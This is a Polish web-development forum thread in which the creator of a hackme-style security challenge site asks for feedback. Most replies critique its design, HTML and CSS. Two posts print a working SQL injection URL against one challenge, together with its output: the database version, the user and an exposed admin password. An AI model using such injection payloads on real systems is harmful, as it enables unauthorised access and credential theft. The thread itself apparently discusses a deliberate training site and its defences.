Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
http://hackme.boo.pl
Proszę o ocenę mojej strony: 1) layout 2) treść (czyli głownie zadania) 3) bezpieczeństwo 4) Ogólne wrażenie |
|
|
|
![]() |
Post
#2
|
|
|
Grupa: Zarejestrowani Postów: 1 333 Pomógł: 137 Dołączył: 25.03.2008 Skąd: jesteś?? Ostrzeżenie: (0%)
|
Na tło dal bym jakieś kreseczki bo przy ~1600/1000 monotonne jest strasznie, napis na logu zlewa się z nim.
Dodatkowo powinieneś ostawić jakieś testowe konto by nie trzeba było się rejestrować... Ps Dwa błędy w html wypadało by poprawić... (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) Ten post edytował ShadowD 9.12.2008, 23:57:43 |
|
|
|
Post
#3
|
|
|
Grupa: Moderatorzy Postów: 15 467 Pomógł: 1451 Dołączył: 25.04.2005 Skąd: Szczebrzeszyn/Rzeszów |
Cytat 4) Ogólne wrażenie Pierwsze wrażenie? "Coś pusto tu". Cytat 1) layout Schludny aż do przesady. (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Cytat 2) treść (czyli głownie zadania) : Cytat Dodatkowo powinieneś ostawić jakieś testowe konto by nie trzeba było się rejestrować...
|
|
|
|
Post
#4
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
dodałem konto testowe i strona validuje się poprawnie
Login: tester Hasło: test Ten post edytował maniekl2 10.12.2008, 18:10:50 |
|
|
|
Post
#5
|
|
|
Grupa: Zarejestrowani Postów: 578 Pomógł: 69 Dołączył: 15.04.2007 Skąd: Wrocław Ostrzeżenie: (0%)
|
"<form>" też da się css-ować!
zrób to, gdyż na Twej stronie są inputy ze standardowym wyglądem i nie wygląda to dobrze. Dodatkowo gdyby w tym górnym panelu były powoli spadające literki zamiast statycznego obrazu byłoby zaje..fajnie. I za dużo bieli - gdzieś musisz dodać tło - w background może być ciemniejsze, w reszcie np. jasny błękit Ten post edytował timon27 11.12.2008, 23:15:28 |
|
|
|
Post
#6
|
|
|
Grupa: Zarejestrowani Postów: 603 Pomógł: 131 Dołączył: 24.07.2007 Skąd: Górny Śląsk Ostrzeżenie: (0%)
|
@timonie27 owszem da się, ale to nie ma sensu, bo każda przeglądarka i tak pokaże to inaczej, że już nie wspomnę o niepoddawaniu się na style inputa do pobierania plików. (Widziałem gdzieś w necie stronę, na której były pokazane różne inputy z różnych przeglądarek, chętnie bym Cię tam odesłał, ale niestety nie znam adresu [może ktoś zna?]).
|
|
|
|
Post
#7
|
|
|
Grupa: Moderatorzy Postów: 15 467 Pomógł: 1451 Dołączył: 25.04.2005 Skąd: Szczebrzeszyn/Rzeszów |
|
|
|
|
Post
#8
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Błękitny kolor nie pasował, więc na tło dodałem lekką szarość. Były chwilowe problemy z testerem bo ktoś zmienił hasło (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) ale już jest wszystko w porządku. Można się logować:
Login: tester Hasło : test erix Dzięki za link Ten post edytował maniekl2 12.12.2008, 14:07:40 |
|
|
|
Post
#9
|
|
|
Grupa: Zarejestrowani Postów: 1 374 Pomógł: 149 Dołączył: 1.03.2006 Ostrzeżenie: (0%)
|
Ogólne wrażenie:
1. Popracować nad kolorystyką: 2. Popracować nad typografią Kod z początku wydawał się niczego sobie, choć wypadałoby choć jakies wcięcia stosować dla lepszej czytelności. Tak sobie przeglądałam i patrzę a tu taki kwiat: Nie dość, że jednokolumnowa tabelka (nie wiadomo po co) to jeszcze w divie i w dodatku do zrobienia odstępu użyty znacznik <br>. A fuj... Poza tym nigdzie nie zauważyłam choćby <h1> i nagle nie z gruszki ni z pietruszki w profilu wyskakuje <h4> Takie coś: To aż się prosi o listę <ul> Na koniec taka uwaga. Namiętnie i z uporem maniaka pomijasz cudzysłowy w których powinny być wpisane wartości atrybutów znaczników, czasem tylko zamiast nich stosujesz apostrofy. Hmmm Nie można zalogować się do nierozwiązanych zadań (IMG:http://forum.php.pl/style_emoticons/default/sad.gif) |
|
|
|
Post
#10
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Dzięki za rady. Postaram się to w najbliższym czasie poprawić.
Hmmm Nie można zalogować się do nierozwiązanych zadań (IMG:http://forum.php.pl/style_emoticons/default/sad.gif) Nie rozumiem dokładnie o co Ci chodzi. Mógłbyś to rozwinąć ? |
|
|
|
Post
#11
|
|
|
Grupa: Zarejestrowani Postów: 1 374 Pomógł: 149 Dołączył: 1.03.2006 Ostrzeżenie: (0%)
|
Nie rozumiem dokładnie o co Ci chodzi. Mógłbyś to rozwinąć ? Mogłabym Otwieram listę zadań. Jest tylko jedna kategoria, WWW. Klikam na nią wyświetla się lista zadań. Klikam w zadanie pojawia się okno zachęcające do wpisania hasła. Wpisuję hasło i dowiaduję się, że jest nieprawidłowe i niniejszym nie mogę obejrzeć zadania. |
|
|
|
Post
#12
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Chyba źle zrozumiałaś po co jest tam to hasło.
Nad inputem do wpisania hasła jest link do zadania. Gdy rozwiążesz zadanie otrzymasz hasło, które musisz wpisać właśnie do tego inputa. Gdy to zrobisz otrzymasz punkty. Wszystkie kwiatki poprawiłem (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Ten post edytował maniekl2 12.12.2008, 20:00:58 |
|
|
|
Post
#13
|
|
|
Grupa: Zarejestrowani Postów: 603 Pomógł: 131 Dołączył: 24.07.2007 Skąd: Górny Śląsk Ostrzeżenie: (0%)
|
Przejrzyj wszystkie linki które wysyłasz na mejla. Bo ja dostałem raz coś takiego na początku linku:http://zadania.skate.boo.pl/
Przy okazji w tytule zjadło polską literę. |
|
|
|
Post
#14
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Nie wiem jak to możliwe że taki link dostałeś. Pokaż dokładnie jak wyglądała wiadomość.
|
|
|
|
Post
#15
|
|
|
Grupa: Zarejestrowani Postów: 603 Pomógł: 131 Dołączył: 24.07.2007 Skąd: Górny Śląsk Ostrzeżenie: (0%)
|
Cytat
|
|
|
|
Post
#16
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Dzięki. Przenosiłem z innego serwera i dlatego wystąpił taki błąd.
|
|
|
|
Post
#17
|
|
|
Grupa: Zarejestrowani Postów: 869 Pomógł: 53 Dołączył: 20.10.2003 Skąd: Przeworsk Ostrzeżenie: (0%)
|
To może i ja się wypowiem.
Wygląd: Strona bez życia. Nic mnie w nim nie pociąga. Szarawe tło to bardzo kiepski pomysł. Amatorskie gradienty, za duże bordery. Bardzo kiepsko. Logotyp nie jest klikalny. Wszędzie ten sam, mdły kolor. Brak wyróżnienia pozycji menu, w której aktualnie się znajdujemy. Ogólnie: 3/10 Kod html: Brak jakiejkolwiek tabulacji! Słowa kluczowe za mało mówiące o stronie, a opis jest genialny. Dlaczego nazwy class w divach nie wpisujesz w cudzysłowach? Następnym razem daj do oceny kod nad którym pracowałeś więcej niż godzinkę. Ogólnie: 2/10. Kod css: Brak tabulacji! Używaj bardziej uniwersalnych czcionek, a jeżeli już musisz taką podać, to jako drugą w kolejności wpisz uniwersalną. Nie ujednolicasz sobie pisania kodu css. Zauważyłem, że czasami na początku dasz padding-i, a czasami font-y. Musisz zastosować hierarchię. Wtedy będzie Ci się łatwiej edytowało kod. Takie coś robi się za pomocą samego border-a. Działanie: Po zalogowaniu się muszę kliknąć "Dalej". Czy nie lepiej od razu odświeżyć stronę? Chciałem zobaczyć o co chodzi z tą stroną, ale w pierwszym zadaniu wyświetla brak pliku. Ten post edytował Kildyt 13.12.2008, 12:31:10 |
|
|
|
Post
#18
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Przyznaję że nie potrafię robić layoutów. Nie mam daru do łączenia kolorów dlatego i tak jestem zadowolony z tego co stworzyłem.
Ale dzięki za krytykę. Na pewno da mi to coś do myślenia. Opisy, kod są jakie są, bo nie przykładałem się do nich. Bardziej myślałem nad kodem php. Ale w najbliższym czasie popracuję nad tym kodem html i css. Działanie: Po zalogowaniu się muszę kliknąć "Dalej". Czy nie lepiej od razu odświeżyć stronę? Chciałem zobaczyć o co chodzi z tą stroną, ale w pierwszym zadaniu wyświetla brak pliku. Zastanawiałem się nad tym odświeżaniem strony, ale wybrałem link "Dalej". Możliwe że to zmienię. Przepraszam za to pierwsze zadanie. Wczoraj niechcący usunąłem jeden plik. Już jest wszystko w porządku. Ten post edytował maniekl2 13.12.2008, 10:29:37 |
|
|
|
Post
#19
|
|
|
Grupa: Zarejestrowani Postów: 172 Pomógł: 9 Dołączył: 22.03.2008 Skąd: Wrocław Ostrzeżenie: (0%)
|
Kod css: Brak tabulacji! Używaj bardziej uniwersalnych czcionek, a jeżeli już musisz taką podać, to jako drugą w kolejności wpisz uniwersalną. Trebuchet MS nie jest uniwersalny wg. Ciebie? To jedna z najczęściej używanych czcionek dzisiaj. Ale fakt, że wers CSS powinien brzmieć: Kod font-family: "Trebuchet MS", sans-serif; Dodanie 'sans-serif' chyba wiadomo co spowoduje;) Nie ujednolicasz sobie pisania kodu css. Zauważyłem, że czasami na początku dasz padding-i, a czasami font-y. Musisz zastosować hierarchię. Wtedy będzie Ci się łatwiej edytowało kod. Ciekawa teoria, ale chyba niewykonalna. Z tego względu, że pisząc kod CSS zwłaszcza pod windowsem testujesz, sprawdzasz dodajesz i odejmujesz wersy i patrzysz jaki jest efekt. Ciężko zachować tę samą kolejność, zresztą kod CSS jest tak prosty, że nie ma tam za bardzo co analizować (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) |
|
|
|
Post
#20
|
|
|
Grupa: Zarejestrowani Postów: 869 Pomógł: 53 Dołączył: 20.10.2003 Skąd: Przeworsk Ostrzeżenie: (0%)
|
Trebuchet MS nie jest uniwersalny wg. Ciebie? To jedna z najczęściej używanych czcionek dzisiaj. Gdzie ty żyjesz? (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Dwie magiczne litery na końcu nazwy fonta mówią wszystko. (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Sprawdziłem na ubuntu 8.10 i takiej czcionki nie ma, a paczki z windowsowskimi czcionkami jak na razie nie zainstalowałem.Ciekawa teoria, ale chyba niewykonalna. Z tego względu, że pisząc kod CSS zwłaszcza pod windowsem testujesz, sprawdzasz dodajesz i odejmujesz wersy i patrzysz jaki jest efekt. Ciężko zachować tę samą kolejność, zresztą kod CSS jest tak prosty, że nie ma tam za bardzo co analizować (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) Jak to niewykonalna? (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Ja jakoś sobie radzę i bardzo ułatwia mi to pracę. Mam taki system (od góry): definiowanie bloku, font-y, rozmiary, background-y, border-y, padding-i, margin-y. Te 3 ostatnie kiedyś mieszałem, ale ostatnio trzymam się zasady.
|
|
|
|
Post
#21
|
|
|
Grupa: Zarejestrowani Postów: 172 Pomógł: 9 Dołączył: 22.03.2008 Skąd: Wrocław Ostrzeżenie: (0%)
|
Gdzie ty żyjesz? (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Dwie magiczne litery na końcu nazwy fonta mówią wszystko. (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Sprawdziłem na ubuntu 8.10 i takiej czcionki nie ma, a paczki z windowsowskimi czcionkami jak na razie nie zainstalowałem. Tak niestety jest, Trebuchet MS jest wszędzie, nie tylko na stronach, ale b. często w reklamach, szyldach itp. Spoko, też mam Ubuntu i wiem, że nie ma (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) Ale mam też windę i nie znam żadnej czcionki bezszeryfowej, która jest i pod Linuksa i pod Windowsa dostępna jako standard. Po prostu dodajesz sans-serif na końcu i użytkownicy windy mają np. Trebuchet, Verdane, czy Arial, a linuksowcy zobaczą np. DejaVu SansSerif (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg) Jak to niewykonalna? (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Ja jakoś sobie radzę i bardzo ułatwia mi to pracę. Mam taki system (od góry): definiowanie bloku, font-y, rozmiary, background-y, border-y, padding-i, margin-y. Te 3 ostatnie kiedyś mieszałem, ale ostatnio trzymam się zasady. No to tak trzymaj. Jednak jesteś jedyną osobą jaką znam, która tak postępuje (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) pzdr; |
|
|
|
Post
#22
|
|
|
Grupa: Zarejestrowani Postów: 603 Pomógł: 131 Dołączył: 24.07.2007 Skąd: Górny Śląsk Ostrzeżenie: (0%)
|
Kod html: Brak jakiejkolwiek tabulacji![...] Kod css: Brak tabulacji! [...] A co Ci do tych tabulacji?! Im mniej białych znaków tym lżejszy plik. Przeglądarce nie robią one żadnej różnicy(!), a jeśli sam chcesz analizować źródło to możesz sobie skorzystać z Firebuga i będziesz miał wcięcia. Zauważyłem, że czasami na początku dasz padding-i, a czasami font-y. Musisz zastosować hierarchię. Wtedy będzie Ci się łatwiej edytowało kod. Osobiście nie hierarchizuje styli w {} i nie wcale nie mam trudniej. |
|
|
|
Post
#23
|
|
|
Grupa: Zarejestrowani Postów: 869 Pomógł: 53 Dołączył: 20.10.2003 Skąd: Przeworsk Ostrzeżenie: (0%)
|
A co Ci do tych tabulacji?! Im mniej białych znaków tym lżejszy plik. Przeglądarce nie robią one żadnej różnicy(!), a jeśli sam chcesz analizować Wybacz, ale chyba nigdy nie napisałeś bardziej złożonego kodu. Pokaż mi porządną stronę bez tabulacji! Pokaż mi złożoną klasę w php bez tabulacji! Pisz 3 warunki i każdy kolejny w poprzednim. Ciekawe ile będziesz główkował co do czego. Zapraszam na PW, żeby nie robić off-topa.Osobiście nie hierarchizuje styli w {} i nie wcale nie mam trudniej. Kto jak lubi. Mi to ułatwia i przestrzegam wytyczonej hierarchii.
Ten post edytował Kildyt 13.12.2008, 18:12:37 |
|
|
|
Post
#24
|
|
|
Grupa: Zarejestrowani Postów: 603 Pomógł: 131 Dołączył: 24.07.2007 Skąd: Górny Śląsk Ostrzeżenie: (0%)
|
Hola kolego, nie mówimy o kodzie php, o html i css. [koniec oftopa /]
|
|
|
|
Post
#25
|
|
|
Grupa: Zarejestrowani Postów: 1 333 Pomógł: 137 Dołączył: 25.03.2008 Skąd: jesteś?? Ostrzeżenie: (0%)
|
Hmmm, zadania mają złą kolejność np zadanie 9 (Bez hasła) za pierwszym razem poszło a nad tymi za 10pkt siedziałem i nic... ;p
|
|
|
|
Post
#26
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
To zależy dla kogo. Dla jednego zadanie związane z JS jest banalne dla drugiego nie. Zadania w których można podejrzeć źródło są mniej punktowane. Czyli JS i proste zadania w których właściwie wystarczy spojrzeć w źródło. Zaś te w których nie da się podejrzeć źródłą skryptu są więcej punktowane, gdyz musisz poprostu domyślić się jak dany skrypt jest zbudowany.
|
|
|
|
Post
#27
|
|
|
Grupa: Zarejestrowani Postów: 1 374 Pomógł: 149 Dołączył: 1.03.2006 Ostrzeżenie: (0%)
|
Nie mam daru do łączenia kolorów dlatego Dlatego powinieneś zacząć używac programó, któe są pomocne przy dobieraniu kolorystyki (sporo tego w sieci jest). Opisy, kod są jakie są, bo nie przykładałem się do nich. Bardziej myślałem nad kodem php. Ale w najbliższym czasie popracuję nad tym kodem html i css. No to ja bym się wstydziła przyznać do tego, że dałam do oceny kod do którego się nie przyłożyłam (IMG:http://forum.php.pl/style_emoticons/default/wstydnis.gif) |
|
|
|
Post
#28
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Bardzo często przychodzi mi mail "Mail delivery failed: returning message to sender", przez to że użytkownicy podają nie istniejące adresy email. I teraz pytanie do Was. Czy jest możliwość sprawdzenia przez skrypt php, czy dany adres email istnieje ?
Ten post edytował maniekl2 15.12.2008, 20:17:54 |
|
|
|
Post
#29
|
|
|
Grupa: Zarejestrowani Postów: 578 Pomógł: 69 Dołączył: 15.04.2007 Skąd: Wrocław Ostrzeżenie: (0%)
|
@timonie27 owszem da się, ale to nie ma sensu, bo każda przeglądarka i tak pokaże to inaczej, że już nie wspomnę o niepoddawaniu się na style inputa do pobierania plików. (Widziałem gdzieś w necie stronę, na której były pokazane różne inputy z różnych przeglądarek, chętnie bym Cię tam odesłał, ale niestety nie znam adresu [może ktoś zna?]). Nie zgodzę sie z tym. Poza tym popatrz na fora (np na TO) inputy są poważnie przetworzone (nie tylko kolory, obramowanie, ale i wielkość i krój czcionki). Wyobraź Sobie jak forum php.pl wyglądałoby ze standardowymi inputami. A w wielu przeglądarkach sprawdzałem i wyglądają tak samo. Bardzo często przychodzi mi mail "Mail delivery failed: returning message to sender", przez to że użytkownicy podają nie istniejące adresy email. I teraz pytanie do Was. Czy jest możliwość sprawdzenia przez skrypt php, czy dany adres email istnieje ? Nie. A przynajmniej nic o takiej techologi nie słyszałem (po samej nazwie nie poznaszbo każdy może mieć konto na własnym serwerze). Możesz jedynie sprawdzać podstawowe sprawy jak: -czy w adresie znajduje się dokładnie jedna małpa -czy po małpie jest co najmniej jedna kropka itp Zazwyczaj tak się to robi. |
|
|
|
Post
#30
|
|
|
Grupa: Zarejestrowani Postów: 2 148 Pomógł: 230 Dołączył: 26.03.2008 Ostrzeżenie: (0%)
|
pelna sciezka do twoich zadanek:
Kod /home/accounts_m/maniekl2/public_html/zadania/ uwazaj troche co piszesz... generalnie duzo mozna sie dowiedziec o tym co tam trzymasz u siebie: np. takie zapytanie: Kod http://zadania.hackme.boo.pl/zadanie10/index.php?login=a%27%20UNION%20SELECT%20concat(%27Wersja%20MySQL:%20%27,@@version,%27%3Cbr%20/%3ESystemik:%20%27,@@version_compile_os,%27%3Cbr%20/%3EAktualnie%20zalogowany%20user:%20%27,USER()),concat(%27%3Cbr%20/%3E%3Cbr%20/%3Ehaslo:%20%27,haslo)%20from%20administracja/* wynik: Kod Wersja MySQL: 4.1.22-log Systemik: pld-linux-gnu Aktualnie zalogowany user: sql_hczadania@10.219.118.5 || haslo: asd!@#s // edit generalnie nie powinno sie ujawniac takich informacji (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Strona merytoryczna: ogólnie lubie hackme... twoje jest troche proste, zrobilem all zadania prócz ostatniego jak narazie, design bardzo lekki Ten post edytował pyro 16.12.2008, 01:03:42 |
|
|
|
Post
#31
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Nie. A przynajmniej nic o takiej techologi nie słyszałem (po samej nazwie nie poznaszbo każdy może mieć konto na własnym serwerze). Możesz jedynie sprawdzać podstawowe sprawy jak: -czy w adresie znajduje się dokładnie jedna małpa -czy po małpie jest co najmniej jedna kropka itp Zazwyczaj tak się to robi. Tak już mam zrobione. Kod /home/accounts_m/maniekl2/public_html/zadania/ Kod http://zadania.hackme.boo.pl/zadanie10/index.php?login=a%27%20UNION%20SELECT%20concat(%27Wersja%20MySQL:%20%27,@@version,%27%3Cbr%20/%3ESystemik:%20%27,@@version_compile_os,%27%3Cbr%20/%3EAktualnie%20zalogowany%20user:%20%27,USER()),concat(%27%3Cbr%20/%3E%3Cbr%20/%3Ehaslo:%20%27,haslo)%20from%20administracja/* wynik: Kod Wersja MySQL: 4.1.22-log Systemik: pld-linux-gnu Aktualnie zalogowany user: sql_hczadania@10.219.118.5 || haslo: asd!@#s Tylko jak zabezpieczyć się przed tym ? Skoro zadanie polega na SQL injection ? Ten post edytował maniekl2 16.12.2008, 17:53:06 |
|
|
|
Post
#32
|
|
|
Grupa: Zarejestrowani Postów: 2 148 Pomógł: 230 Dołączył: 26.03.2008 Ostrzeżenie: (0%)
|
co do ścieżek to ustaw jakis error_handler
co do mysqla to moze jakies wyrażonka regularne? Ten post edytował pyro 17.12.2008, 21:53:58 |
|
|
|
Post
#33
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
A w jaki sposób zdobyłeś tą ścieżkę ?
Ten post edytował maniekl2 16.12.2008, 21:44:50 |
|
|
|
Post
#34
|
|
|
Grupa: Zarejestrowani Postów: 2 148 Pomógł: 230 Dołączył: 26.03.2008 Ostrzeżenie: (0%)
|
w ktoryms z zadań (nie tylko w jednym) wsytarczylo podawac w zmiennych jakies bledne dane, naprzyklad bylo takie zadanie z bledem LFI, tam podalem jakies dane, bo myslalem za pierwszym razem ze to SQL Injection i wyskoczyl blad...
|
|
|
|
Post
#35
|
|
|
Grupa: Zarejestrowani Postów: 226 Pomógł: 25 Dołączył: 4.07.2007 Skąd: Berlin Ostrzeżenie: (0%)
|
Mógłbyś oznaczać jakoś zrobione zadania. Niektóre chce na przykład zostawi na potem i teraz nie wiem które rozwiązałem a które nie (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)
|
|
|
|
Post
#36
|
|
|
Grupa: Developerzy Postów: 823 Pomógł: 12 Dołączył: 18.12.2005 Ostrzeżenie: (0%)
|
Cytat "Hasło nie poprawne" niepoprawne pisze się razem, nie oddzielnie (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif)
|
|
|
|
Post
#37
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
niepoprawne pisze się razem, nie oddzielnie (IMG:http://forum.php.pl/style_emoticons/default/tongue.gif) Dzięki, poprawione, choć nie jestem pewien czy w każdym pliku poprawiłem. Cytat(bartg) Mógłbyś oznaczać jakoś zrobione zadania. Niektóre chce na przykład zostawi na potem i teraz nie wiem które rozwiązałem a które nie (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) Miałem to w planach wcześniej. Niedługo to dodam. Ten post edytował maniekl2 7.01.2009, 22:19:33 |
|
|
|
Post
#38
|
|
|
Grupa: Developerzy Postów: 823 Pomógł: 12 Dołączył: 18.12.2005 Ostrzeżenie: (0%)
|
Cytat Miałem to w planach wcześniej. Niedługo to dodam. Super by było, bo jak znajdę trochę czasu, chętnie powrócę do gry, żeby mieć wyższe miejsce w rankingu.
|
|
|
|
Post
#39
|
|
|
Grupa: Moderatorzy Postów: 4 069 Pomógł: 497 Dołączył: 11.05.2007 Skąd: Warszawa |
jak jest link do zadania , np:
Zdobądź hasło na stronę. Oto link od zadnia : http://zadania.hackme.boo.pl/zadanie2/ to mógł by się otwierać w nowej karcie... |
|
|
|
Post
#40
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Poprawione...
Athlan: A odnośnie tego sprawdzania to jak wejdziesz w zadania to jeżeli jest zrobione pokaże się napis: Cytat *pole do wpisania hasła nie pojawia jeżeli już zrobiłeś to zadanie
|
|
|
|
Post
#41
|
|
|
Grupa: Developerzy Postów: 823 Pomógł: 12 Dołączył: 18.12.2005 Ostrzeżenie: (0%)
|
Cytat Athlan: A odnośnie tego sprawdzania to jak wejdziesz w zadania to jeżeli jest zrobione pokaże się napis: Ale muszę wchodzić w każdy task. To tak jakbyś nie miał na forum oznaczonych tematów nieprzeczytanych i musiał klikać w każdy, żeby sprawdzić, czy doszedł jakiś post.
|
|
|
|
Post
#42
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Ja nie powiedziałem, że tak zostanie.Tylko to może ci posłużyć tymczasowo.
|
|
|
|
Post
#43
|
|
|
Grupa: Moderatorzy Postów: 36 565 Pomógł: 6315 Dołączył: 27.12.2004 |
wchodząc w podglad usera widzę jego email (IMG:http://forum.php.pl/style_emoticons/default/blinksmiley.gif)
No jak tak traktujesz swoich userow, ze upubliczniasz ich adresy email, to ja dziekuje za taki serwis... no chyba ze user jawnie wyraził zgodę na otrzymywanie spamu przez spamboty, ktore w ten sposób zdobedą jego email |
|
|
|
Post
#44
|
|
|
Grupa: Zarejestrowani Postów: 654 Pomógł: 17 Dołączył: 19.03.2006 Skąd: z kosmosu ;) Ostrzeżenie: (0%)
|
Moim skromnym zdaniem jest tak:
- Witryna "daje frajde" z hackowania bazy danych itp - sprawdzenia umiejętności (...), ale sam autor nie umie się zabezpieczyć przed takimi atakami. Design: 4/10 - Białe standardowe tło jest brzydkie, spróbuj inny kolor, może jakieś lekkie paski? eee... nie nie pasuje. Pozdrawiam, WebNuLL |
|
|
|
Post
#45
|
|
|
Grupa: Developerzy Postów: 823 Pomógł: 12 Dołączył: 18.12.2005 Ostrzeżenie: (0%)
|
Cytat wchodząc w podglad usera widzę jego email Właśnie jeszcze o tym miałem napisać, ale wyleciało mi z głowy. Nie życzę sobie podawania mojego adresu email publicznie. Nie akceptowałem żadnego regulaminu i nie miałem do przeczytania żadnej polityki prywatności.Proszę o usunięcie z mojego profilu adresu emailowego. (bo spamboty przyjdą, zabiorą i dostane spama ;p) |
|
|
|
Post
#46
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
Za ten email przepraszam, jestem właśnie podczas dodawania możliwości ukrycia emaila.
|
|
|
|
Post
#47
|
|
|
Grupa: Moderatorzy Postów: 36 565 Pomógł: 6315 Dołączył: 27.12.2004 |
Cytat jestem właśnie podczas dodawania możliwości ukrycia emaila To nie jest jakis malutki bug. Zanim dodasz te mozliwosc, najzwyklej w swiecie go do tej pory nie wyswietlaj. Po dodaniu tej mozliwosci domyslnie ustaw ze ludziom sie nie wyswietla. Nie sądze by ktos wogole chcial go ustawiac by wyswietlal |
|
|
|
Post
#48
|
|
|
Grupa: Zarejestrowani Postów: 162 Pomógł: 29 Dołączył: 6.04.2008 Ostrzeżenie: (0%)
|
To nie jest jakis malutki bug. Zanim dodasz te mozliwosc, najzwyklej w swiecie go do tej pory nie wyswietlaj. Po dodaniu tej mozliwosci domyslnie ustaw ze ludziom sie nie wyswietla. Nie sądze by ktos wogole chcial go ustawiac by wyswietlal Dokładnie tak zrobiłem zanim przeczytałem twój post |
|
|
|
Post
#49
|
|
|
Grupa: Moderatorzy Postów: 4 069 Pomógł: 497 Dołączył: 11.05.2007 Skąd: Warszawa |
w zadaniach kod html jest zły:P
przykład: |
|
|
|
![]() ![]() |
|
Aktualny czas: 9.06.2026 - 15:36 |